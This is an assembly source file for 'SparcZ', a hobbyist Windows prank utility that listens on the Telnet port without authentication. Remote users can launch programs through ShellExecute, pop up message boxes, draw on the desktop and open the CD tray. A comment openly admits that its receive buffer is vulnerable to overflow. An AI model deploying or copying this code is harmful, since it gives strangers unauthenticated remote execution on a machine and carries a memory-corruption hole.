📄 sparcz.asm
字号:
; SparcZ - A Funny little Network utility
; by ronybc ( url: http://www.ronybc.8k.com )
.486p
.model flat,stdcall
option casemap:none
include windows.inc
include user32.inc
include wsock32.inc
include kernel32.inc
include gdi32.inc
include winmm.inc
includelib user32.lib
includelib wsock32.lib
includelib kernel32.lib
includelib gdi32.lib
includelib winmm.lib
include shell32.inc
includelib shell32.lib
.data
ClassName db "Kunthrandam",0
AppName db "SPARCz",0
fname1 db "C:\Zerver.log",0
ftxt1 db "connected from : ",0
welcome db 13,10,
"You are connected to -",13,10,13,10,
" __ __ __ __ ___________________________",13,10,
" (_ |__) |__| |__) / ",13,10,
" _____) | | | | \ \__ ZERVER BY RONYBC ",13,10,
13,10,13,10,13,10,0
killed db "You killed that poor Zerver..! ",13,10,0
thankz db "bye.... visit http://www.ronybc.8k.com",13,10,0
gotit db "ok..... ",0
errrr db "error.. ",0
cm00 db "open",0
cm01 db "box",0
cm02 db "kill",0
cm03 db "bye",0
cm04 db "cd",0
cm05 db "line",0
cm06 db "msg",0
mci1 db "set cdaudio door open",0
mci2 db "set cdaudio door closed",0
mci3 db 0
buff db 512 dup (0) ; vulnerable to buffer overflow attacks :)
buff2 db 512 dup (0)
.data?
s1 SOCKET ?
s2 SOCKET ?
sin1 sockaddr_in <>
sin2 sockaddr_in <>
wsaData WSADATA <>
hFile dd ?
fwritten dd ?
temp dd ?
deskdc HDC ?
font LOGFONT <>
.code
start:
invoke WSAStartup,0101h,ADDR wsaData
invoke socket,PF_INET,SOCK_STREAM,0
mov s1,eax
mov ax,AF_INET
mov sin1.sin_family,ax
xor eax,eax
mov sin1.sin_addr,eax
invoke htons,23 ;Telnet port
mov sin1.sin_port,ax
invoke bind,s1,ADDR sin1,SIZEOF sockaddr_in
cmp eax,SOCKET_ERROR
jne @F
invoke WSACleanup
xor eax,eax
ret
@@:
invoke listen,s1,1
next_user:
invoke closesocket,s2
mov eax,SIZEOF sockaddr_in
mov temp,eax
invoke accept,s1,ADDR sin2,ADDR temp
mov s2,eax
invoke send,s2,ADDR welcome,SIZEOF welcome,0
invoke CreateFile,ADDR fname1,GENERIC_WRITE,FILE_SHARE_READ,0,
OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,0
mov hFile,eax
invoke SetFilePointer,hFile,0,0,FILE_END
mov eax,sin2.sin_addr ;get IP address of user
invoke inet_ntoa,eax
mov temp,eax
mov edi,OFFSET buff2
invoke lstrcpy,edi,ADDR ftxt1
add edi,SIZEOF ftxt1
invoke lstrcpy,edi,temp
invoke lstrlen,temp
add edi,eax
mov eax,0a0d0000h
mov [edi],eax
add edi,4
mov eax,edi
sub eax,OFFSET buff2
mov temp,eax ; log new connection to C:\Zerver.log
invoke WriteFile,hFile,ADDR buff2,eax,ADDR fwritten,0
invoke send,s2,ADDR buff2,temp,0
invoke send,s2,ADDR gotit,SIZEOF gotit,0
invoke CloseHandle,hFile
next_command:
mov edi,OFFSET buff
mov eax,SIZEOF buff
call clrbuff
mov edi,OFFSET buff
crecv:
invoke recv,s2,edi,500,0
or eax,eax
jz next_user
cmp eax,SOCKET_ERROR
je next_user
add edi,eax
mov al,[edi-1]
cmp al,08h ; check for 'Backspace'
jne @F
xor eax,eax
mov [edi],ax
dec edi
dec edi
@@:
cmp al,0Ah
jne crecv
invoke CreateFile,ADDR fname1,GENERIC_WRITE,FILE_SHARE_READ,0,
OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,0
mov hFile,eax ; log commands to file C:\Zerver.log
invoke SetFilePointer,hFile,0,0,FILE_END
invoke lstrlen,ADDR buff
invoke WriteFile,hFile,ADDR buff,eax,ADDR fwritten,0
invoke CloseHandle,hFile
; this block seems ugly
invoke lstrcpyn,ADDR buff2,ADDR buff,SIZEOF cm06
invoke lstrcmpi,ADDR buff2,ADDR cm06
or eax,eax
jz dmsg
invoke lstrcpyn,ADDR buff2,ADDR buff,SIZEOF cm05
invoke lstrcmpi,ADDR buff2,ADDR cm05
or eax,eax
jz dline
invoke lstrcpyn,ADDR buff2,ADDR buff,SIZEOF cm04
invoke lstrcmpi,ADDR buff2,ADDR cm04
or eax,eax
jz cdrom
invoke lstrcpyn,ADDR buff2,ADDR buff,SIZEOF cm03
invoke lstrcmpi,ADDR buff2,ADDR cm03
or eax,eax
jz byebye
invoke lstrcpyn,ADDR buff2,ADDR buff,SIZEOF cm02
invoke lstrcmpi,ADDR buff2,ADDR cm02
or eax,eax
jz killer
invoke lstrcpyn,ADDR buff2,ADDR buff,SIZEOF cm01
invoke lstrcmpi,ADDR buff2,ADDR cm01
or eax,eax
jz msgbx
invoke lstrcpyn,ADDR buff2,ADDR buff,SIZEOF cm00
invoke lstrcmpi,ADDR buff2,ADDR cm00
or eax,eax
jnz err
invoke lstrlen,OFFSET buff
mov edx,OFFSET buff
xor ebx,ebx
mov [edx+eax-2],ebx
add edx,5
invoke ShellExecute,NULL,ADDR cm00,edx,NULL,NULL,SW_SHOWNORMAL
invoke send,s2,ADDR gotit,SIZEOF gotit,0
jmp next_command
err:
invoke send,s2,ADDR errrr,SIZEOF errrr,0
jmp next_command
msgbx:
mov eax,OFFSET buff
add eax,3
mov ebx,MB_OK
or ebx,MB_TOPMOST
or ebx,MB_SYSTEMMODAL
or ebx,MB_ICONINFORMATION
invoke MessageBox,NULL,eax,ADDR AppName,ebx
invoke send,s2,ADDR gotit,SIZEOF gotit,0
jmp next_command
dline:
invoke GetDC,0 ;get desktop DC
mov deskdc,eax
invoke MoveToEx,deskdc,100,300,NULL
invoke LineTo,deskdc,250,100 ; draw it annoying
invoke LineTo,deskdc,550,400
invoke LineTo,deskdc,600,430
invoke ReleaseDC,0,deskdc
invoke send,s2,ADDR gotit,SIZEOF gotit,0
jmp next_command
dmsg:
invoke GetDC,0
mov deskdc,eax
invoke SystemParametersInfo,
SPI_GETICONTITLELOGFONT,SIZEOF font,ADDR font,0
mov edi,OFFSET font
mov edx,36 ;font size
mov [edi],edx
invoke CreateFontIndirect,ADDR font
invoke SelectObject,deskdc,eax
invoke lstrlen,ADDR buff
sub eax,3 ;'msg'
sub eax,2 ; carriage return
mov ecx,eax
mov eax,OFFSET buff
add eax,3
invoke TextOut,deskdc,100,200,eax,ecx
invoke ReleaseDC,0,deskdc
invoke send,s2,ADDR gotit,SIZEOF gotit,0
jmp next_command
cdrom:
mov edi,OFFSET buff
mov eax,[edi+2]
cmp eax,"nepo" ;open or close
je cdopen
cmp eax,"solc"
jne err
cdclose:
invoke mciSendString,ADDR mci2,ADDR mci3,0,0
invoke send,s2,ADDR gotit,SIZEOF gotit,0
jmp next_command
cdopen:
invoke mciSendString,ADDR mci1,ADDR mci3,0,0
invoke send,s2,ADDR gotit,SIZEOF gotit,0
jmp next_command
clrbuff:
xor edx,edx
mov [edi],edx
add edi,4
mov ebx,[edi]
test ebx,ebx
jnz clrbuff
ret
byebye:
invoke send,s2,ADDR thankz,SIZEOF thankz,0
jmp next_user
killer:
invoke send,s2,ADDR killed,SIZEOF killed,0
invoke closesocket,s1
invoke closesocket,s2
invoke WSACleanup
xor eax,eax
ret
end start⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -